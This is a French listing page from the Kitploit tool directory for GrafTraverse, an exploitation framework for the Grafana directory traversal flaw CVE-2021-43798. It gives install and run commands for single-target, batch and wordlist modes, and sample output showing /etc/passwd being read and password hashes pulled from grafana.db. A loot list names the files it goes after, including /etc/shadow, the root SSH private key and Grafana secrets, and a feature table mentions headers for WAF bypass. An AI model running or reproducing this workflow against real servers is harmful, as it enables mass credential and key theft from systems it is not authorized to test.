Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
GrafTraverse-CVE-2021-43798 — CVE-2021-43798 MiNi Exploitation Framework | Kitploit
Outils/GitHubGitHub/asbawy/graftraverse-cve-2021-43798
Cassage de Mots de PasseAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubasbawy/graftraverse-cve-2021-43798

GrafTraverse-CVE-2021-43798

CVE-2021-43798 MiNi Exploitation Framework

Voir le dépôt
il y a 2 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

GrafTraverse - CVE-2021-43798 MiNi Cadre d'Exploitation

Outil d'automatisation en ligne de commande pour les tests de sécurité autorisés du Directory Traversal Grafana (CVE-2021-43798).


Présentation

Banner

CVE-2021-43798 est une vulnérabilité de traversée de répertoire non authentifiée dans Grafana 8.x qui permet aux attaquants de lire des fichiers arbitraires sur le système de fichiers sous-jacent via le point de terminaison /public/plugins/. La cause racine est une mauvaise sanitisation des chemins sur les requêtes d'actifs de plugins, permettant aux séquences ../ de s'échapper du répertoire prévu.

GrafTraverse est une réécriture complète de la preuve de concept originale. Il corrige des bugs critiques de gestion des requêtes, ajoute le scan batch multi-threadé, la découverte automatique de plugins, l'extraction de credentials et le reporting structuré — en faisant un outil de qualité production pour les red teams et les testeurs de pénétration.


Fonctionnalités


Installation

root@kitploit:~
# Clonez le dépôt
git clone https://github.com/asbawy/GrafTraverse.git
cd GrafTraverse

# Assurez-vous que requests est disponible (il est fourni avec Kali)
pip3 install requests

# Rendez-le exécutable
chmod +x GrafTraverse.py

Utilisation

GrafTraverse utilise une CLI basée sur des sous-commandes. Toutes les commandes supportent --help.

1. Cible unique interactive

Lancer le menu interactif contre un hôte :

root@kitploit:~
python3 GrafTraverse.py single -u http://IP:PORT
root@kitploit:~
============================================================
 INTERACTIVE MODE
============================================================
 1. /etc/passwd
 2. grafana.ini
 3. grafana.db
 4. Custom path
 5. Full automated loot
 6. Scan plugins
 7. Exit
============================================================

2. Scan de plugins

Identifier rapidement quel point de terminaison de plugin est vulnérable sans exploitation :

root@kitploit:~
python3 GrafTraverse.py scan -u http://target:PORT

3. Scan batch

Charger les cibles depuis un fichier et les traiter simultanément :

root@kitploit:~
python3 GrafTraverse.py batch -l targets.txt --workers 10 --csv results.csv

Format targets.txt :

root@kitploit:~
http://192.168.1.10:3000
http://192.168.1.11:3000
https://grafana.target.com
# Les lignes commençant par # sont ignorées

4. Énumération via wordlist

Fournir une liste de fichiers personnalisée pour une traversée approfondie :

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --wordlist sensitive_files.txt   --output-dir ./loot   --json log.json

5. Proxy et en-têtes personnalisés

Acheminer via Burp Suite et ajouter des en-têtes personnalisés :

root@kitploit:~
python3 GrafTraverse.py single -u http://target:3000   --proxy http://127.0.0.1:8080   -H "X-Forwarded-For: 127.0.0.1"   -H "Authorization: Bearer eyJ0..."

Référence des commandes

single

batch

FlagDescription
-l, --listFichier avec les URL cibles (requis)
--workersThreads simultanés (défaut : 5)
(tous les flags de single sont supportés)

scan

FlagDescription
-u, --urlURL cible (requis)
(tous les flags réseau sont supportés)

Exemple de sortie

Récupération de fichiers réussie

root@kitploit:~
[+] Output: 20260526_GrafTraverse
[*] Testing: /etc/passwd (via alertlist)
[+] SUCCESS: /etc/passwd (1874 bytes)

------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
------------------------------------------------------------

[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_passwd

Extraction de hash de la base Grafana

root@kitploit:~
[*] Testing: /var/lib/grafana/grafana.db (via alertlist)
[+] SUCCESS: /var/lib/grafana/grafana.db (98304 bytes)
[+] Saved: 20260526_GrafTraverse/http___10.129.234.47_3000_grafana.db
[*] Extracted 3 password hashes:
    admin:PBKDF2$sha256$10000$...base64...
    editor:PBKDF2$sha256$10000$...base64...
    viewer:PBKDF2$sha256$10000$...base64...

Fichiers cibles (Butin automatisé)

La séquence de butin intégrée tente de récupérer les fichiers suivants dans l'ordre :


Versions affectées

  • Grafana 8.0.0 à 8.3.0
  • Corrigé dans 8.3.1 et 7.5.12
Télécharger l’outil
FonctionnalitéDescription
Brute-force multi-pluginsSonde automatiquement plus de 40 plugins intégrés pour trouver un chemin vulnérable
Mode interactifExploitation cible unique pilotée par menu avec aperçu en direct des fichiers
Mode batchScan concurrent multi-cibles avec travailleurs de threads configurables
Mode wordlistÉnumération approfondie de fichiers à l'aide de wordlists personnalisées
Extraction automatique de hashExtrait automatiquement les hachages de mots de passe PBKDF2 de grafana.db téléchargé
Journalisation structuréeExporter les résultats au format JSON et CSV pour des rapports sans couture
Support proxyAcheminer le trafic via Burp, ZAP, ou tout proxy HTTP (--proxy)
En-têtes personnalisésInjecter des en-têtes arbitraires pour contournement WAF ou jetons d'authentification (-H)
Personnalisation de la traverséeRemplacer la profondeur de traversée par défaut pour des environnements non standard (--depth)
Filtrage intelligentÉlimine les faux positifs en rejetant les réponses JS/CSS/HTML des plugins
Zéro dépendanceNécessite seulement requests (préinstallé sur Kali / Parrot)
FlagDescription
-u, --urlURL cible (requis)
--no-downloadMode visualisation seule, ne pas enregistrer les fichiers
-t, --timeoutDélai d'expiration de la requête en secondes (défaut : 10)
--proxyURL du proxy HTTP/HTTPS
-H, --headerEn-tête personnalisé (répétable)
--depthChaîne de traversée (défaut : ../../../../../../../../)
--output-dirRépertoire pour enregistrer les fichiers récupérés
--jsonAjouter les résultats au fichier journal JSON
--csvAjouter les résultats au fichier journal CSV
--wordlistFichier contenant les chemins à énumérer
--pluginForcer un nom de plugin spécifique
FichierTypeSensibilité
/etc/passwdTexteÉnumération d'utilisateurs
/etc/shadowTexteHachages de mots de passe (rarement lisibles)
/etc/hostsTexteTopologie réseau
/etc/hostnameTexteIdentification de l'hôte
/etc/grafana/grafana.iniTexteSecrets Grafana et identifiants de base
/var/lib/grafana/grafana.dbBinaireBase SQLite avec hachages utilisateur et clés API
/var/log/grafana/grafana.logTexteInformations opérationnelles
/root/.ssh/id_rsaTexteClé privée SSH
/root/.ssh/authorized_keysTexteCartographie des accès par clé
/proc/self/environTexteVariables d'environnement du processus
/proc/self/cmdlineTexteArguments du processus
/proc/versionTexteVersion du noyau
/proc/mountsTexteStructure du système de fichiers
/etc/os-releaseTexteIdentification du système d'exploitation
/etc/issueTexteIdentification du système d'exploitation
/etc/crontabTexteTâches planifiées
/etc/resolv.confTexteConfiguration DNS